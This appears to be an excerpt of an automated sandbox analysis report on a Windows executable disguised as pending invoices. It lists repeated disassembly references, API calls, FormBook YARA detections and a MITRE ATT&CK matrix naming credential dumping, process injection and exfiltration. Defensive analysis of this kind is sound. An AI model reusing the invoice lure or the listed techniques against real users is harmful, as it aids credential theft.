      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB480 mov eax, dword ptr fs:[00000030h]3_2_324DB480
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325134B0 mov eax, dword ptr fs:[00000030h]3_2_325134B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325874B0 mov eax, dword ptr fs:[00000030h]3_2_325874B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D74B0 mov eax, dword ptr fs:[00000030h]3_2_324D74B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D74B0 mov eax, dword ptr fs:[00000030h]3_2_324D74B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258B550 mov eax, dword ptr fs:[00000030h]3_2_3258B550
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251B570 mov eax, dword ptr fs:[00000030h]3_2_3251B570
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251B570 mov eax, dword ptr fs:[00000030h]3_2_3251B570
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB562 mov eax, dword ptr fs:[00000030h]3_2_324DB562
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517505 mov eax, dword ptr fs:[00000030h]3_2_32517505
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32517505 mov ecx, dword ptr fs:[00000030h]3_2_32517505
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D530 mov eax, dword ptr fs:[00000030h]3_2_3251D530
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D530 mov eax, dword ptr fs:[00000030h]3_2_3251D530
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5537 mov eax, dword ptr fs:[00000030h]3_2_325B5537
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259B52F mov eax, dword ptr fs:[00000030h]3_2_3259B52F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324ED534 mov eax, dword ptr fs:[00000030h]3_2_324ED534
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258F525 mov eax, dword ptr fs:[00000030h]3_2_3258F525
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D5D0 mov eax, dword ptr fs:[00000030h]3_2_3255D5D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D5D0 mov ecx, dword ptr fs:[00000030h]3_2_3255D5D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325095DA mov eax, dword ptr fs:[00000030h]3_2_325095DA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35D7 mov eax, dword ptr fs:[00000030h]3_2_325B35D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325155C0 mov eax, dword ptr fs:[00000030h]3_2_325155C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B55C9 mov eax, dword ptr fs:[00000030h]3_2_325B55C9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015F4 mov eax, dword ptr fs:[00000030h]3_2_325015F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D758F mov eax, dword ptr fs:[00000030h]3_2_324D758F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256B594 mov eax, dword ptr fs:[00000030h]3_2_3256B594
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256B594 mov eax, dword ptr fs:[00000030h]3_2_3256B594
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250F5B0 mov eax, dword ptr fs:[00000030h]3_2_3250F5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259F5BE mov eax, dword ptr fs:[00000030h]3_2_3259F5BE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D5B0 mov eax, dword ptr fs:[00000030h]3_2_3257D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D5B0 mov eax, dword ptr fs:[00000030h]3_2_3257D5B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325735BA mov eax, dword ptr fs:[00000030h]3_2_325735BA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B35B6 mov eax, dword ptr fs:[00000030h]3_2_325B35B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325015A9 mov eax, dword ptr fs:[00000030h]3_2_325015A9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9A40 mov ecx, dword ptr fs:[00000030h]3_2_324D9A40
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573A78 mov eax, dword ptr fs:[00000030h]3_2_32573A78
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32509A18 mov ecx, dword ptr fs:[00000030h]3_2_32509A18
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255DA1D mov eax, dword ptr fs:[00000030h]3_2_3255DA1D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32587A11 mov edi, dword ptr fs:[00000030h]3_2_32587A11
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov ecx, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32515A01 mov eax, dword ptr fs:[00000030h]3_2_32515A01
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258BA0B mov eax, dword ptr fs:[00000030h]3_2_3258BA0B
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FA02 mov eax, dword ptr fs:[00000030h]3_2_3259FA02
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DBA10 mov eax, dword ptr fs:[00000030h]3_2_324DBA10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DA20 mov eax, dword ptr fs:[00000030h]3_2_3250DA20
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DA20 mov eax, dword ptr fs:[00000030h]3_2_3250DA20
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov ecx, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBA30 mov eax, dword ptr fs:[00000030h]3_2_324EBA30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575AD0 mov eax, dword ptr fs:[00000030h]3_2_32575AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250BADA mov eax, dword ptr fs:[00000030h]3_2_3250BADA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32561ACB mov eax, dword ptr fs:[00000030h]3_2_32561ACB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32561ACB mov ecx, dword ptr fs:[00000030h]3_2_32561ACB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DBAE0 mov eax, dword ptr fs:[00000030h]3_2_324DBAE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7A80 mov eax, dword ptr fs:[00000030h]3_2_324D7A80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FA87 mov eax, dword ptr fs:[00000030h]3_2_3259FA87
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DFAA4 mov ecx, dword ptr fs:[00000030h]3_2_324DFAA4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBAA0 mov eax, dword ptr fs:[00000030h]3_2_324EBAA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EBAA0 mov eax, dword ptr fs:[00000030h]3_2_324EBAA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov ecx, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov ecx, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3258DAAC mov eax, dword ptr fs:[00000030h]3_2_3258DAAC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32591AA3 mov eax, dword ptr fs:[00000030h]3_2_32591AA3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DAAE mov eax, dword ptr fs:[00000030h]3_2_3250DAAE
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DFB4C mov edi, dword ptr fs:[00000030h]3_2_324DFB4C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575B50 mov eax, dword ptr fs:[00000030h]3_2_32575B50
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32575B50 mov eax, dword ptr fs:[00000030h]3_2_32575B50
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32583B60 mov eax, dword ptr fs:[00000030h]3_2_32583B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1B04 mov eax, dword ptr fs:[00000030h]3_2_324E1B04
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1B04 mov eax, dword ptr fs:[00000030h]3_2_324E1B04
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B3B10 mov eax, dword ptr fs:[00000030h]3_2_325B3B10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov eax, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250DB00 mov edx, dword ptr fs:[00000030h]3_2_3250DB00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FB0C mov eax, dword ptr fs:[00000030h]3_2_3259FB0C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519B28 mov eax, dword ptr fs:[00000030h]3_2_32519B28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519B28 mov eax, dword ptr fs:[00000030h]3_2_32519B28
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7BCD mov eax, dword ptr fs:[00000030h]3_2_324D7BCD
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D7BCD mov ecx, dword ptr fs:[00000030h]3_2_324D7BCD
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E9BC4 mov eax, dword ptr fs:[00000030h]3_2_324E9BC4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256FBDC mov eax, dword ptr fs:[00000030h]3_2_3256FBDC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F3BD6 mov eax, dword ptr fs:[00000030h]3_2_324F3BD6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3259FBF3 mov eax, dword ptr fs:[00000030h]3_2_3259FBF3
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521BEF mov eax, dword ptr fs:[00000030h]3_2_32521BEF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32521BEF mov eax, dword ptr fs:[00000030h]3_2_32521BEF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeProcess created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.2776555713.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Virtualization/Sandbox Evasion      		OS Credential Dumping221
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Access Token Manipulation      		LSASS Memory1
